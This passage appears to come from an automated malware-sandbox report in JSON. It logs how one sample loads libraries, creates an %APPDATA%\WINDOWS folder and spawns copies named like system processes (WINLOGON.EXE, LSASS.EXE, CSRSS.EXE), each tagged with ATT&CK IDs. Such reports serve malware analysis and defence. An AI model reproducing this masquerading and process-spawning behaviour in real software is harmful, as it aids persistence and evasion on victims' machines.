parameter user32 (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003904)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003548)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003548)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003548)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003548)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003548)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003548)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003548)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003548)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003816)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003816)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003816)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003816)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003816)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003816)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003816)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003816)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003816)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003816)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004112)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004112)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004508)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004508)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004508)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004508)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004508)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004508)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003652)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003652)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004172)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004172)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004172)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004172)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004172)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004172)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004172)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003676)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003676)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003676)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003676)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003676)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003676)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003856)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003856)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003856)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003856)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003856)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003636)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003636)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003636)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003636)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003636)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003636)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003636)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003636)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002356)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002356)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002356)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002356)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002356)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002356)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003232)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003232)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003232)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003232)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003232)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003232)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003232)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003232)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003232)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002244)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002244)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002244)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002244)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002244)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002244)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002244)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002244)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003700)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003700)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003700)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003700)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000884)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000884)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002032)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002032)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002484)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002484)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002484)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002484)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002484)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002484)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003220)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003220)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003220)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003220)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003220)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003220)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003220)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003220)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003220)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003220)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004580)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D80000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D80000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D80000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D80000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D80000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D80000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D80000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D80000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00005912)\n \"D3_08.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005904)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005904)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00005904)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004200)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006068)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006040)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003476)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003904)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005912)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005904)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005904)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005904)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005904)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005904)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005904)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005904)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00004200)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00006068)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005904)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004200)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006100)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006036)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006068)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002312)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006120)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006024)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004424)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004416)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006040)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003524)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003572)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004420)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003476)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001748)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002684)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002656)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004116)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001856)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001176)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003904)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003548)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003816)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004112)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"D3_08.exe\" (UID: 00000000-00005904) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"D3_08.exe\" (UID: 00000000-00005904) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005904)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004200)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006100)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006036)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006068)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002312)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006120)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006024)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004424)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004416)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006040)\n Spawned process \"SERVICES.EXE\" (UID: 